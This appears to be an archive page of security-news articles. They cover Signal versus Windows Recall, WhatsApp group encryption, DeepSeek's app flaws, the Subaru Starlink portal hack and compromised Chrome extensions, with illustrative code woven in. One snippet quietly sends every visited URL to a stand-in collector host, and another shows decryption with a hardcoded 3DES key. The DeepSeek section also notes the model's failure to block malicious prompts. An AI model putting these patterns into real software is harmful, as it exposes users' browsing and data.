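    # Ask Windows to blank this window in any screen capture, including the
    # screenshots Recall takes. Returns False if the call fails (e.g., on
    # older Windows versions that only support WDA_MONITOR).
    return bool(
        ctypes.windll.user32.SetWindowDisplayAffinity(hwnd, WDA_EXCLUDEFROMCAPTURE)
    )
```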

“We hope that the AI teams building systems like Recall will think through these implications more carefully in the future,” Signal wrote Wednesday. “Apps like Signal shouldn’t have to implement ‘one weird trick’ in order to maintain the privacy and integrity of their services without proper developer tools. People who care about privacy shouldn’t be forced to sacrifice accessibility upon the altar of AI aspirations either.”

Signal’s move will lessen the chances of Recall permanently indexing private messages, but it also has its limits. The measure only provides protection when all parties to a chat—at least those using the Windows Desktop version—haven’t changed the default settings.

Microsoft officials didn’t immediately respond to an email asking why Windows provides developers with no granular control over Recall and whether the company has plans to add any.

WhatsApp provides no cryptographic management for group messages

The flow of adding new members to a WhatsApp group message is:

  • A group member sends an unsigned message to the WhatsApp server that designates which users are group members, for instance, Alice, Bob, and Charlie
  • The server informs all existing group members that Alice, Bob, and Charlie have been added
  • The existing members have the option of deciding whether to accept messages from Alice, Bob, and Charlie, and whether messages exchanged with them should be encrypted

With no cryptographic signatures verifying an existing member who wants to add a new member, additions can be made by anyone with the ability to control the server or messages that flow into it. Using the common fictional scenario for illustrating end-to-end encryption, this lack of cryptographic assurance leaves open the possibility that Mallory can join a group and gain access to the human-readable messages exchanged there.

WhatsApp isn’t the only messenger lacking cryptographic assurances for new group members. In 2022, a team that included some of the same researchers that analyzed WhatsApp found that Matrix—an open source and proprietary platform for chat and collaboration clients and servers—also provided no cryptographic means for ensuring only authorized members join a group. The Telegram messenger, meanwhile, offers no end-to-end encryption for group messages, making the app among the weakest for ensuring the confidentiality of group messages.

By contrast, the open source Signal messenger provides a cryptographic assurance that only an existing group member designated as the group admin can add new members. In an email, researcher Benjamin Dowling, also of King’s College, explained:

Signal implements “cryptographic group management.” Roughly this means that the administrator of a group, a user, signs a message along the lines of “Alice, Bob and Charley are in this group” to everyone else. Then, everybody else in the group makes their decision on who to encrypt to and who to accept messages from based on these cryptographically signed messages, [meaning] who to accept as a group member. The system used by Signal is a bit different [than WhatsApp], since [Signal] makes additional efforts to avoid revealing the group membership to the server, but the core principles remain the same.

On a high-level, in Signal, groups are associated with group membership lists that are stored on the Signal server. An administrator of the group generates a GroupMasterKey that is used to make changes to this group membership list. In particular, the GroupMasterKey is sent to other group members via Signal, and so is unknown to the server. Thus, whenever an administrator wants to make a change to the group (for instance, invite another user), they need to create an updated membership list (authenticated with the GroupMasterKey) telling other users of the group who to add. Existing users are notified of the change and update their group list, and perform the appropriate cryptographic operations with the new member so the existing member can begin sending messages to the new members as part of the group.
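
As a rough illustration of why signed membership updates matter, the toy below (not Signal’s actual wire format, which also hides the roster from the server) uses an Ed25519 admin key with the pip-installable cryptography package. Members apply an update only if the admin’s signature verifies, so a server that injects “add Mallory” without the key is rejected:

```python
import json
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

admin_key = Ed25519PrivateKey.generate()  # held only by the group admin
admin_public = admin_key.public_key()     # known to every group member

def signed_update(members: list[str]) -> tuple[bytes, bytes]:
    payload = json.dumps({"members": sorted(members)}).encode()
    return payload, admin_key.sign(payload)

def accept_update(payload: bytes, signature: bytes) -> list[str] | None:
    try:
        admin_public.verify(signature, payload)  # raises if not admin-signed
    except InvalidSignature:
        return None  # reject: the update didn't come from the admin
    return json.loads(payload)["members"]

payload, sig = signed_update(["Alice", "Bob", "Charlie"])
print(accept_update(payload, sig))  # accepted
forged = json.dumps({"members": ["Alice", "Bob", "Charlie", "Mallory"]}).encode()
print(accept_update(forged, sig))   # None: signature doesn't match the payload
```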

Most messaging apps, including Signal, don’t certify the identity of their users. That means there’s no way Signal can verify that an account named Alice does, in fact, belong to Alice. It’s fully possible that Mallory could create an account and name it Alice. (As an aside, and in sharp contrast to Signal, the account members that belong to a given WhatsApp group are visible to insiders, hackers, and to anyone with a valid subpoena.)

That groan you hear is users’ reaction to Recall going back into Windows

Security and privacy advocates are girding themselves for another uphill battle against Recall, the AI tool rolling out in Windows 11 that will screenshot, index, and store everything a user does every three seconds.

When Recall was first introduced in May 2024, security practitioners roundly castigated it for creating a gold mine for malicious insiders, criminals, or nation-state spies if they managed to gain even brief administrative access to a Windows device. Privacy advocates warned that Recall was ripe for abuse in intimate partner violence settings. They also noted that there was nothing stopping Recall from preserving sensitive disappearing content sent through privacy-protecting messengers such as Signal.

Enshittification at a new scale

Following months of backlash, Microsoft later suspended Recall. On Thursday, the company said it was reintroducing Recall. It currently is available only to insiders with access to the Windows 11 Build 26100.3902 preview version. Over time, the feature will be rolled out more broadly. Microsoft officials wrote:

Recall (preview) saves you time by offering an entirely new way to search for things you’ve seen or done on your PC securely. With the AI capabilities of Copilot+ PCs, it’s now possible to quickly find and get back to any app, website, image, or document just by describing its content. To use Recall, you will need to opt-in to saving snapshots, which are images of your activity, and enroll in Windows Hello to confirm your presence so only you can access your snapshots. You are always in control of what snapshots are saved and can pause saving snapshots at any time. As you use your Copilot+ PC throughout the day working on documents or presentations, taking video calls, and context switching across activities, Recall will take regular snapshots and help you find things faster and easier. When you need to find or get back to something you’ve done previously, open Recall and authenticate with Windows Hello. When you’ve found what you were looking for, you can reopen the application, website, or document, or use Click to Do to act on any image or text in the snapshot you found.

Microsoft is hoping that the concessions requiring opt-in and the ability to pause Recall will help quell the collective revolt that broke out last year. It likely won’t for various reasons.

“MyTerms” wants to become the new way we dictate our privacy on the web

Searls and his group are putting up the standards and letting the browsers, extension-makers, website managers, mobile platforms, and other pieces of the tech stack craft the tools. So long as the human is the first party to a contract, the digital thing is the second, a “disinterested non-profit” provides the roster of agreements, and both sides keep records of what they agreed to, the function can take whatever shape the Internet decides.

Terms offered, not requests submitted

Searls’ and his group’s standard is a plea for a sensible alternative to the modern reality of accessing web information. It asks us to stop pretending that we’re all reading agreements stuffed full of opaque language, agreeing to thousands upon thousands of words’ worth of terms every day and willfully offering up information about ourselves. And, of course, it makes people ask if it is due to become another version of Do Not Track.

Do Not Track was a request, while MyTerms is inherently a demand. Websites and services could, of course, simply refuse to show or provide content and data if a MyTerms agent is present, or they could ask or demand that people set the least restrictive terms.

There is nothing inherently wrong with setting up a user-first privacy scheme and pushing for sites and software to do the right thing and abide by it. People may choose to stick to search engines and sites that agree to MyTerms. Time will tell if MyTerms can gain the kind of leverage Searls is aiming for.

Privacy-problematic DeepSeek pulled from app stores in South Korea

In a media briefing held Monday, the South Korean Personal Information Protection Commission indicated that it had paused new downloads within the country of Chinese AI startup DeepSeek’s mobile app. The restriction took effect on Saturday and doesn’t affect South Korean users who already have the app installed on their devices. The DeepSeek service also remains accessible in South Korea via the web.

Per Reuters, PIPC explained that representatives from DeepSeek acknowledged the company had “partially neglected” some of its obligations under South Korea’s data protection laws, which provide South Koreans some of the strictest privacy protections globally.

PIPC investigation division director Nam Seok is quoted by the Associated Press as saying DeepSeek “lacked transparency about third-party data transfers and potentially collected excessive personal information.” DeepSeek reportedly has dispatched a representative to South Korea to work through any issues and bring the app into compliance.

It’s unclear how long the app will remain unavailable in South Korea, with PIPC saying only that the privacy issues it identified with the app might take “a considerable amount of time” to resolve.

Western infosec sources have also expressed dissatisfaction with aspects of DeepSeek’s security. Mobile security company NowSecure reported two weeks ago that the app sends information unencrypted to servers located in China and controlled by TikTok owner ByteDance; the week before that, another security company found an open, web-accessible database filled with DeepSeek customer chat history and other sensitive data.

Ars attempted to ask DeepSeek’s DeepThink (R1) model about the Tiananmen Square massacre or its favorite “Winnie the Pooh” movie, but the LLM continued to have no comment.

DeepSeek iOS app sends data unencrypted to ByteDance-controlled servers


Apple’s defenses that protect data from being sent in the clear are globally disabled.

A little over two weeks ago, a largely unknown China-based company named DeepSeek stunned the AI world with the release of an open source AI chatbot that had simulated reasoning capabilities that were largely on par with those from market leader OpenAI. Within days, the DeepSeek AI assistant app climbed to the top of the iPhone App Store’s “Free Apps” category, overtaking ChatGPT.

On Thursday, mobile security company NowSecure reported that the app sends sensitive data over unencrypted channels, making the data readable to anyone who can monitor the traffic. More sophisticated attackers could also tamper with the data while it’s in transit. Apple strongly encourages iPhone and iPad developers to enforce encryption of data sent over the wire using ATS (App Transport Security). For unknown reasons, that protection is globally disabled in the app, NowSecure said.

Basic security protections MIA

What’s more, the data is sent to servers that are controlled by ByteDance, the Chinese company that owns TikTok. While some of that data is properly encrypted using transport layer security, once it’s decrypted on the ByteDance-controlled servers, it can be cross-referenced with user data collected elsewhere to identify specific users and potentially track queries and other usage.

More technically, the DeepSeek AI chatbot uses an open weights simulated reasoning model. Its performance is largely comparable with OpenAI’s o1 simulated reasoning (SR) model on several math and coding benchmarks. The feat, which largely took AI industry watchers by surprise, was all the more stunning because DeepSeek reported spending only a small fraction of what OpenAI spent to build its model.

A NowSecure audit of the app found other behaviors the researchers flagged as potentially concerning. For instance, the app uses a symmetric encryption scheme known as 3DES, or triple DES. The scheme was deprecated by NIST following research in 2016 that showed it could be broken in practical attacks to decrypt web and VPN traffic. Another concern is that the symmetric keys, which are identical for every iOS user, are hardcoded into the app and stored on the device.
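
NowSecure hasn’t published the app’s decompiled routine, so the sketch below (using the pip-installable pycryptodome package, with a made-up key) only reproduces the anti-pattern described: a 3DES key baked into the binary is identical for every install, so anyone who extracts it once can decrypt this traffic for all users:

```python
from Crypto.Cipher import DES3  # pip install pycryptodome
from Crypto.Util.Padding import pad, unpad

# Anti-pattern: a key shipped inside the app binary. Every user shares it,
# and anyone who unpacks the app can recover it (this value is made up).
HARDCODED_KEY = b"0123456789abcdef01234567"  # 24-byte 3DES key

def app_encrypt(plaintext: bytes) -> bytes:
    cipher = DES3.new(HARDCODED_KEY, DES3.MODE_CBC)
    return cipher.iv + cipher.encrypt(pad(plaintext, DES3.block_size))

def attacker_decrypt(blob: bytes) -> bytes:
    # Nothing secret is needed beyond the extracted key: the IV travels
    # with the ciphertext, and the key is the same on every device.
    cipher = DES3.new(HARDCODED_KEY, DES3.MODE_CBC, iv=blob[:8])
    return unpad(cipher.decrypt(blob[8:]), DES3.block_size)

print(attacker_decrypt(app_encrypt(b"device id + query metadata")))
```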

The app is “not equipped or willing to provide basic security protections of your data and identity,” NowSecure co-founder Andrew Hoog told Ars. “There are fundamental security practices that are not being observed, either intentionally or unintentionally. In the end, it puts your and your company’s data and identity at risk.”

Hoog said the audit is not yet complete, so there are many questions and details left unanswered or unclear. He said the findings were concerning enough that NowSecure wanted to disclose what is currently known without delay.

In a report, he wrote:

NowSecure recommends that organizations remove the DeepSeek iOS mobile app from their environment (managed and BYOD deployments) due to privacy and security risks, such as:

  1. Privacy issues due to insecure data transmission
  2. Vulnerability issues due to hardcoded keys
  3. Data sharing with third parties such as ByteDance
  4. Data analysis and storage in China

Hoog added that the DeepSeek app for Android is even less secure than its iOS counterpart and should also be removed.

Representatives for both DeepSeek and Apple didn’t respond to an email seeking comment.

Data sent entirely in the clear during the app’s initial registration includes:

  • organization id
  • the version of the software development kit used to create the app
  • user OS version
  • language selected in the configuration

Apple strongly encourages developers to implement ATS to ensure the apps they submit don’t transmit any data insecurely over HTTP channels. For reasons that Apple hasn’t explained publicly, Hoog said, this protection isn’t mandatory. DeepSeek has yet to explain why ATS is globally disabled in the app or why it uses no encryption when sending this information over the wire.
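
ATS is controlled by keys in an app’s Info.plist: setting NSAllowsArbitraryLoads to true under NSAppTransportSecurity is what “globally disabled” means in practice. Below is a hedged sketch of how an auditor might flag that configuration using Python’s standard-library plistlib; the bundle path is hypothetical:

```python
import plistlib

def ats_globally_disabled(info_plist_path: str) -> bool:
    # True if the app opts out of ATS entirely, permitting plain-HTTP
    # connections to any host.
    with open(info_plist_path, "rb") as f:
        info = plistlib.load(f)
    ats = info.get("NSAppTransportSecurity", {})
    return bool(ats.get("NSAllowsArbitraryLoads", False))

# e.g., after unzipping an .ipa:
# ats_globally_disabled("Payload/SomeApp.app/Info.plist")
```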

This data, along with a mix of other encrypted information, is sent to DeepSeek over infrastructure provided by Volcengine, a cloud platform developed by ByteDance. While the IP address the app connects to geolocates to the US and is owned by US-based telecom Level 3 Communications, the DeepSeek privacy policy makes clear that the company “store[s] the data we collect in secure servers located in the People’s Republic of China.” The policy further states that DeepSeek:

may access, preserve, and share the information described in “What Information We Collect” with law enforcement agencies, public authorities, copyright holders, or other third parties if we have good faith belief that it is necessary to:

• comply with applicable law, legal process or government requests, as consistent with internationally recognised standards.

NowSecure still doesn’t know precisely what the app uses its 3DES encryption functions for. Hardcoding the key into the app, however, is a major security failure, one that has been recognized as bad practice in software encryption for more than a decade.

No good reason

NowSecure’s Thursday report adds to a growing list of safety and privacy concerns already reported by others.

One was the terms spelled out in the above-mentioned privacy policy. Another came last week in a report from researchers at Cisco and the University of Pennsylvania. It found that DeepSeek R1, the simulated reasoning model, failed to block a single one of 50 malicious prompts designed to generate toxic content, a 100 percent attack success rate.

A third concern is research from security firm Wiz that uncovered a publicly accessible, fully controllable database belonging to DeepSeek. It contained more than 1 million instances of “chat history, backend data, and sensitive information, including log streams, API secrets, and operational details,” Wiz reported. An open web interface also allowed for full database control and privilege escalation, with internal API endpoints and keys available through the interface and common URL parameters.

Thomas Reed, staff product manager for Mac endpoint detection and response at security firm Huntress, and an expert in iOS security, said he found NowSecure’s findings concerning.

“ATS being disabled is generally a bad idea,” he wrote in an online interview. “That essentially allows the app to communicate via insecure protocols, like HTTP. Apple does allow it, and I’m sure other apps probably do it, but they shouldn’t. There’s no good reason for this in this day and age.”

He added: “Even if they were to secure the communications, I’d still be extremely unwilling to send any remotely sensitive data that will end up on a server that the government of China could get access to.”

HD Moore, founder and CEO of runZero, said he was less concerned about ByteDance or other Chinese companies having access to data.

“The unencrypted HTTP endpoints are inexcusable,” he wrote. “You would expect the mobile app and their framework partners (ByteDance, Volcengine, etc) to hoover device data, just like anything else—but the HTTP endpoints expose data to anyone in the network path, not just the vendor and their partners.”

On Thursday, US lawmakers began pushing to immediately ban DeepSeek from all government devices, citing national security concerns that the Chinese Communist Party may have built a backdoor into the service to access Americans’ sensitive private data. If the bill passes, DeepSeek could be banned from government devices within 60 days.

This story was updated to add further examples of security concerns regarding DeepSeek.


Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him on Mastodon and Bluesky. Contact him on Signal at DanArs.82.

DeepSeek iOS app sends data unencrypted to ByteDance-controlled servers Read More »

millions-of-subarus-could-be-remotely-unlocked,-tracked-due-to-security-flaws

Millions of Subarus could be remotely unlocked, tracked due to security flaws


Flaws also allowed access to one year of location history.

About a year ago, security researcher Sam Curry bought his mother a Subaru, on the condition that, at some point in the near future, she let him hack it.

It took Curry until last November, when he was home for Thanksgiving, to begin examining the 2023 Impreza’s Internet-connected features and start looking for ways to exploit them. Sure enough, he and a researcher working with him online, Shubham Shah, soon discovered vulnerabilities in a Subaru web portal that let them hijack the ability to unlock the car, honk its horn, and start its ignition, reassigning control of those features to any phone or computer they chose.

Most disturbing for Curry, though, was that they found they could also track the Subaru’s location—not merely where it was at the moment but also where it had been for the entire year that his mother had owned it. The map of the car’s whereabouts was so accurate and detailed, Curry says, that he was able to see her doctor visits, the homes of the friends she visited, even which exact parking space his mother parked in every time she went to church.

A year of location data for Sam Curry’s mother’s 2023 Subaru Impreza that Curry and Shah were able to access in Subaru’s employee admin portal thanks to its security vulnerabilities. Credit: Sam Curry

“You can retrieve at least a year’s worth of location history for the car, where it’s pinged precisely, sometimes multiple times a day,” Curry says. “Whether somebody’s cheating on their wife or getting an abortion or part of some political group, there are a million scenarios where you could weaponize this against someone.”

Curry and Shah today revealed in a blog post their method for hacking and tracking millions of Subarus, which they believe would have allowed hackers to target any of the company’s vehicles equipped with its digital features known as Starlink in the US, Canada, or Japan. Vulnerabilities they found in a Subaru website intended for the company’s staff allowed them to hijack an employee’s account to both reassign control of cars’ Starlink features and also access all the vehicle location data available to employees, including the car’s location every time its engine started, as shown in their video below.

Curry and Shah reported their findings to Subaru in late November, and Subaru quickly patched its Starlink security flaws. But the researchers warn that the Subaru web vulnerabilities are just the latest in a long series of similar web-based flaws they and other security researchers working with them have found that have affected well over a dozen carmakers, including Acura, Genesis, Honda, Hyundai, Infiniti, Kia, Toyota, and many others. There’s little doubt, they say, that similarly serious hackable bugs exist in other auto companies’ web tools that have yet to be discovered.

In Subaru’s case, in particular, they also point out that their discovery hints at how pervasively those with access to Subaru’s portal can track its customers’ movements, a privacy issue that will last far longer than the web vulnerabilities that exposed it. “The thing is, even though this is patched, this functionality is still going to exist for Subaru employees,” Curry says. “It’s just normal functionality that an employee can pull up a year’s worth of your location history.”

When WIRED reached out to Subaru for comment on Curry and Shah’s findings, a spokesperson responded in a statement that “after being notified by independent security researchers, [Subaru] discovered a vulnerability in its Starlink service that could potentially allow a third party to access Starlink accounts. The vulnerability was immediately closed and no customer information was ever accessed without authorization.”

The Subaru spokesperson also confirmed to WIRED that “there are employees at Subaru of America, based on their job relevancy, who can access location data.” The company offered as an example that employees have that access so they can share a vehicle’s location with first responders when a collision is detected. “All these individuals receive proper training and are required to sign appropriate privacy, security, and NDA agreements as needed,” Subaru’s statement added. “These systems have security monitoring solutions in place which are continually evolving to meet modern cyber threats.”

Responding to Subaru’s example of notifying first responders after a collision, Curry notes that such a feature would hardly require a year’s worth of location history. The company didn’t respond to WIRED’s question about how far back it retains customers’ location histories and makes them available to employees.

Shah and Curry’s research that led them to the discovery of Subaru’s vulnerabilities began when they found that Curry’s mother’s Starlink app connected to the domain SubaruCS.com, which they realized was an administrative domain for employees. Scouring that site for security flaws, they found that they could reset employees’ passwords simply by guessing their email address, which gave them the ability to take over any employee account whose email they could find. The password reset functionality did ask for answers to two security questions, but those answers were checked by code running locally in the user’s browser, not on Subaru’s server, allowing the safeguard to be easily bypassed. “There were really multiple systemic failures that led to this,” Shah says.
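The anti-pattern is simple enough to sketch in a few lines of TypeScript. This is a hypothetical reconstruction, not Subaru’s actual code: in the broken variant, the expected answers live in the browser, where an attacker can read them from the page source or skip the comparison entirely; the fix is for the browser to forward the answers and let the server decide.

```typescript
// BROKEN: the expected answers were delivered to the browser, so the
// check runs entirely client-side and can be bypassed or simply read.
function validateLocally(answers: string[], expected: string[]): boolean {
  return answers.every((a, i) => a.trim().toLowerCase() === expected[i]);
}

// SAFER: the browser only forwards the answers; the server compares them
// against values it never sent to the client. Endpoint name is invented.
async function validateOnServer(userId: string, answers: string[]): Promise<boolean> {
  const res = await fetch("/api/password-reset/verify", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ userId, answers }),
  });
  return res.ok;
}
```

Anything the browser can evaluate, an attacker controls, so the server-side comparison is the entire safeguard.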

The two researchers say they found the email address for a Subaru Starlink developer on LinkedIn, took over the employee’s account, and immediately found that they could use that staffer’s access to look up any Subaru owner by last name, zip code, email address, phone number, or license plate to access their Starlink configurations. In seconds, they could then reassign control of the Starlink features of that user’s vehicle, including the ability to remotely unlock the car, honk its horn, start its ignition, or locate it, as shown in the video below.

Those vulnerabilities alone, for drivers, present serious theft and safety risks. Curry and Shah point out that a hacker could have targeted a victim for stalking or theft, looked up someone’s vehicle’s location, then unlocked their car at any time—though a thief would have to somehow also use a separate technique to disable the car’s immobilizer, the component that prevents it from being driven away without a key.

Those car hacking and tracking techniques alone are far from unique. Last summer, Curry and another researcher, Neiko Rivera, demonstrated to WIRED that they could pull off a similar trick with any of millions of vehicles sold by Kia. Over the prior two years, a larger group of researchers, of which Curry and Shah are a part, discovered web-based security vulnerabilities that affected cars sold by Acura, BMW, Ferrari, Genesis, Honda, Hyundai, Infiniti, Mercedes-Benz, Nissan, Rolls Royce, and Toyota.

More unusual in Subaru’s case, Curry and Shah say, is that they were able to access fine-grained, historical location data for Subarus going back at least a year. Subaru may in fact collect multiple years of location data, but Curry and Shah tested their technique only on Curry’s mother, who had owned her Subaru for about a year.

Curry argues that Subaru’s extensive location tracking is a particularly disturbing demonstration of the car industry’s lack of privacy safeguards around its growing collection of personal data on drivers. “It’s kind of bonkers,” he says. “There’s an expectation that a Google employee isn’t going to be able to just go through your emails in Gmail, but there’s literally a button on Subaru’s admin panel that lets an employee view location history.”

The two researchers’ work contributes to a growing sense of concern over the enormous amount of location data that car companies collect. In December, information a whistleblower provided to the German hacker collective the Chaos Computer Club and Der Spiegel revealed that Cariad, a software company that partners with Volkswagen, had left detailed location data for 800,000 electric vehicles publicly exposed online. Privacy researchers at the Mozilla Foundation warned in a September report that “modern cars are a privacy nightmare,” noting that 92 percent give car owners little to no control over the data they collect, and 84 percent reserve the right to sell or share your information. (Subaru tells WIRED that it “does not sell location data.”)

“While we worried that our doorbells and watches that connect to the Internet might be spying on us, car brands quietly entered the data business by turning their vehicles into powerful data-gobbling machines,” Mozilla’s report reads.

Curry and Shah’s discovery of the security vulnerabilities in Subaru’s tracking demonstrates a particularly egregious exposure of that data, but also a privacy problem that’s hardly less disturbing now that the vulnerabilities are patched, says Robert Herrell, the executive director of the Consumer Federation of California, which has sought to create legislation limiting a car’s data tracking.

“It seems like there are a bunch of employees at Subaru that have a scary amount of detailed information,” Herrell says. “People are being tracked in ways that they have no idea are happening.”

This story originally appeared on wired.com.


Wired.com is your essential daily guide to what’s next, delivering the most original and complete take you’ll find anywhere on innovation’s impact on technology, science, business and culture.

Millions of Subarus could be remotely unlocked, tracked due to security flaws Read More »

time-to-check-if-you-ran-any-of-these-33-malicious-chrome-extensions

Time to check if you ran any of these 33 malicious Chrome extensions

Screenshot showing the phishing email sent to Cyberhaven extension developers. Credit: Amit Assaraf

A link in the email led to a Google consent screen requesting access permission for an OAuth application named Privacy Policy Extension. A Cyberhaven developer granted the permission and, in the process, unknowingly gave the attacker the ability to upload new versions of Cyberhaven’s Chrome extension to the Chrome Web Store. The attacker then used the permission to push out the malicious version 24.10.4.

Screenshot showing the Google permission request. Credit: Amit Assaraf

As word of the attack spread in the early hours of December 25, developers and researchers discovered that other extensions were targeted, in many cases successfully, by the same spear phishing campaign. John Tuckner, founder of Secure Annex, a browser extension analysis and management firm, said that as of Thursday afternoon, he knew of 19 other Chrome extensions that were similarly compromised. In every case, the attacker used spear phishing to push a new malicious version and custom, look-alike domains to issue payloads and receive authentication credentials. Collectively, the 20 extensions had 1.46 million downloads.

“For many I talk to, managing browser extensions can be a lower priority item in their security program,” Tuckner wrote in an email. “Folks know they can present a threat, but rarely are teams taking action on them. We’ve often seen in security [that] one or two incidents can cause a reevaluation of an organization’s security posture. Incidents like this often result in teams scrambling to find a way to gain visibility and understanding of impact to their organizations.”

The earliest compromise occurred in May 2024. Tuckner provided the following spreadsheet:

Name | ID | Version (compromised → patched, where available) | Patch Available | Users | Start | End
--- | --- | --- | --- | --- | --- | ---
VPNCity | nnpnnpemnckcfdebeekibpiijlicmpom | 2.0.1 | FALSE | 10,000 | 12/12/24 | 12/31/24
Parrot Talks | kkodiihpgodmdankclfibbiphjkfdenh | 1.16.2 | TRUE | 40,000 | 12/25/24 | 12/31/24
Uvoice | oaikpkmjciadfpddlpjjdapglcihgdle | 1.0.12 | TRUE | 40,000 | 12/26/24 | 12/31/24
Internxt VPN | dpggmcodlahmljkhlmpgpdcffdaoccni | 1.1.1 → 1.2.0 | TRUE | 10,000 | 12/25/24 | 12/29/24
Bookmark Favicon Changer | acmfnomgphggonodopogfbmkneepfgnh | 4.00 | TRUE | 40,000 | 12/25/24 | 12/31/24
Castorus | mnhffkhmpnefgklngfmlndmkimimbphc | 4.40 → 4.41 | TRUE | 50,000 | 12/26/24 | 12/27/24
Wayin AI | cedgndijpacnfbdggppddacngjfdkaca | 0.0.11 | TRUE | 40,000 | 12/19/24 | 12/31/24
Search Copilot AI Assistant for Chrome | bbdnohkpnbkdkmnkddobeafboooinpla | 1.0.1 | TRUE | 20,000 | 7/17/24 | 12/31/24
VidHelper – Video Downloader | egmennebgadmncfjafcemlecimkepcle | 2.2.7 | TRUE | 20,000 | 12/26/24 | 12/31/24
AI Assistant – ChatGPT and Gemini for Chrome | bibjgkidgpfbblifamdlkdlhgihmfohh | 0.1.3 | FALSE | 4,000 | 5/31/24 | 10/25/24
TinaMind – The GPT-4o-powered AI Assistant! | befflofjcniongenjmbkgkoljhgliihe | 2.13.0 → 2.14.0 | TRUE | 40,000 | 12/15/24 | 12/20/24
Bard AI chat | pkgciiiancapdlpcbppfkmeaieppikkk | 1.3.7 | FALSE | 100,000 | 9/5/24 | 10/22/24
Reader Mode | llimhhconnjiflfimocjggfjdlmlhblm | 1.5.7 | FALSE | 300,000 | 12/18/24 | 12/19/24
Primus (prev. PADO) | oeiomhmbaapihbilkfkhmlajkeegnjhe | 3.18.0 → 3.20.0 | TRUE | 40,000 | 12/18/24 | 12/25/24
Cyberhaven security extension V3 | pajkjnmeojmbapicmbpliphjmcekeaac | 24.10.4 → 24.10.5 | TRUE | 400,000 | 12/24/24 | 12/26/24
GraphQL Network Inspector | ndlbedplllcgconngcnfmkadhokfaaln | 2.22.6 → 2.22.7 | TRUE | 80,000 | 12/29/24 | 12/30/24
GPT 4 Summary with OpenAI | epdjhgbipjpbbhoccdeipghoihibnfja | 1.4 | FALSE | 10,000 | 5/31/24 | 9/29/24
Vidnoz Flex – Video recorder & Video share | cplhlgabfijoiabgkigdafklbhhdkahj | 1.0.161 | FALSE | 6,000 | 12/25/24 | 12/29/24
YesCaptcha assistant | jiofmdifioeejeilfkpegipdjiopiekl | 1.1.61 | TRUE | 200,000 | 12/29/24 | 12/31/24
Proxy SwitchyOmega (V3) | hihblcmlaaademjlakdpicchbjnnnkbo | 3.0.2 | TRUE | 10,000 | 12/30/24 | 12/31/24

But wait, there’s more

One of the compromised extensions is called Reader Mode. Further analysis showed it had been compromised not just in the campaign targeting the other 19 extensions but in a separate campaign that started no later than April 2023. Tuckner said the source of the compromise appears to be a code library developers can use to monetize their extensions. The code library collects details about each web visit a browser makes. In exchange for incorporating the library into the extensions, developers receive a commission from the library creator.
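As a rough sketch of how a library like that can operate, consider the following TypeScript for a Chrome extension background script. The APIs are Chrome’s real extension APIs, but the endpoint and payload are invented; this is not the specific library Tuckner identified.

```typescript
// Background (service worker) code for a hypothetical extension that has
// the "tabs" permission in its manifest. Every completed page load is
// reported to a remote collector, invisible to the user.
chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
  if (changeInfo.status === "complete" && tab.url) {
    fetch("https://collector.example.com/visit", { // invented endpoint
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ url: tab.url, ts: Date.now() }),
    }).catch(() => {}); // fail silently; the user never sees an error
  }
});
```

Nothing about the visited page changes, so users get no visible signal that their browsing is being reported.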

Time to check if you ran any of these 33 malicious Chrome extensions Read More »